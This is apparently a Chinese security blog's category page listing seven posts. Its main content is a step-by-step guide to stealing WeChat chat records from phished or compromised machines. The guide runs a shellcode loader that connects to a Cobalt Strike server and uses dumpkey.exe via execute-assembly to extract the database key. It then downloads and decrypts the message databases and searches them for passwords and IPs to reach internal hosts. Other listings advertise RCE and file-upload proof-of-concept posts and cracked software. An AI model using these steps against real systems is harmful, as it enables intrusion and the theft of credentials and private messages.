首页
网络安全
游戏源码
小程序源码
应用资源
影视资源
音频资源
关于
关键词搜索
搜索
标签搜索
周杰伦专辑
小程序
小程序源码
小程序源码打包
wpsrce
wps漏洞
wps远程命令执行
网神 SecGate防火墙漏洞
IntelliJ IDEA
CVE-2012-1889
CVE-2019-0708
自动化安全测试工具
量化交易
Ethereum
区块链
热门文章
1
周杰伦歌曲全集mp3 周杰伦所有专辑全部歌曲合集打包下载
2.4k 阅读
2
金山WPS RCE
1.5k 阅读
3
20套小程序源码(带后端)
1.4k 阅读
4
IntelliJ IDEA 2021.3.3 最新版本 永久激活教程 破解教程 亲测可用 附带下载
1.4k 阅读
5
CVE-2019-0708 微软远程桌面服务远程代码执行漏洞分析之补丁分析
1k 阅读
6
高频对冲做市网格策略
959 阅读
7
腾讯云容器安全白皮书.pdf
909 阅读
8
网神,SecGate ,obj_app_upfile,任意文件上传漏洞 POC
898 阅读
9
均值回归策略
769 阅读
testgo1
首页
分类
网络安全
游戏源码
小程序源码
应用资源
影视资源
音频资源
页面
关于
用户登录
登录
注册
“网络安全” 共(7)篇
钓鱼场景微信聊天回传
实战中钓⻥时常在微信聊天记录中找到目标内网系统账号、机器账号密码,尽可能的不触发大量扫描告警下在内网中精准打到跳板机。一、使用场景钓⻥攻击(通过钓⻥ / 微信控到的机器通常都是登录状态) 渗透到运维机器(有些运维机器会日常登录自己的微信)二、获取微信聊天记录过程 在第一步需要用到,Sharp-dumpkey工具,下面对Sharp-dumpkey工具进行介绍:项目地址:https://github.com/Ormicron/Sharp-dumpkey基于C#实现的获取微信数据库密钥的小工具,可配合chatViewTool使用。 可直接执行命令.\dumpkey.exe,查看微信数据库密钥,并回传DBpass.bin文件 中。暂时不支持微信多开场景的密钥获取。需微信登录后才可抓取密钥。程序未采用动态获取基址的方式,因此为保证程序可用性,运行时会在线拉取基址。在被获取权限PC端执行 .\co.exe shellcode -f .\cece.txt,可连接到CS服务器在被获取权限PC处,右键选择Interact,可进入命令执行1、获取微信数据库密钥,执行命令execute-assembly C:\Users\summer\Desktop\test\dumpkey.exe回传 DBpass.bin,该文件中记录了微信数据库密钥2、下载目标聊天数据库文件,默认保存目录在以下目录,超出 240MB 会自动 生成 MSG1.db,以此类推。C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi\MSG0.db C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\MicroMsg.db备注:MSG0.db文件存放聊天记录MicroMsg.db文件存放好友列表执行命令shell C:\Users\summer\Desktop\test\FileSearch.exe search C:\ MSG可找到文件MSG0.db连接被获取权限PC的文件夹,找到目录C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi下载文件MSG0.db并存放到自定义目录 即可找到目录C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg下载文件MicroMsg.db并存放到自定义目录 (与MSG0.db放到同一目录下)在第3步之前对ChatViewTool工具进行介绍: 项目地址https://github.com/Ormicron/chatViewToolChatViewTool是一个配合dumpkey(微信数据库秘钥获取工具)使用的小工具,该 工具实现了微信数据库解密以及展示数据库聊天记录的功能。使用方法在获取数据库秘钥之后将内容保存为文本文件DBPass.Bin,随后提取以下相关 的数据库放于秘钥文件同目录。C:\Users\summer\Documents\WeChat Files\wxid_vd0nxyv6n20t22\Msg\Multi\MSG0.db C:\Users\summer\Documents\WeChatFiles\wxid_vd0nxyv6n20t22\Msg\MicroMsg.db随后打开ChatViewTool点击“数据库解密”并选择秘钥及数据库所在的目录,待解 密完成后点击查看数据库,选择同目录,双击联系人列表即可展示对应的聊天记录将上面DBpass.bin、MSG0.db、MicroMsg.db三个文件回传到同目录,配合 ChatViewTool 打开解密即可查看,在搜索处 “administrator” “root” “密码” “ip 等”,项目地址。
2024年06月07日
丨
528阅读
丨
2评论
网络安全
金山WPS RCE
金山WPS RCE;利用方式:新建一个1.html,在1.html当前路径下启动http server并监听80端口,修改hosts文件,POC代码如下:
2023年08月17日
丨
1.5k阅读
丨
14评论
网络安全
网神,SecGate ,obj_app_upfile,任意文件上传漏洞 POC
网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 POC
2023年08月16日
丨
898阅读
丨
5评论
网络安全
腾讯云容器安全白皮书.pdf
腾讯云容器安全白皮书.pdf
2023年07月05日
丨
909阅读
丨
4评论
网络安全
上千个自动化安全测试工具
上千个自动化安全测试工具
2020年03月02日
丨
755阅读
丨
2评论
网络安全
CVE-2012-1889 Win7 通过GUID加载dll库绕过ASLR+DEP
CVE-2012-1889 Win7 通过GUID加载dll库绕过ASLR+DEP
2019年09月20日
丨
648阅读
丨
1评论
网络安全
CVE-2019-0708 微软远程桌面服务远程代码执行漏洞分析之补丁分析
CVE-2019-0708 微软远程桌面服务远程代码执行漏洞分析之补丁分析
2019年05月15日
丨
1k阅读
丨
5评论
网络安全
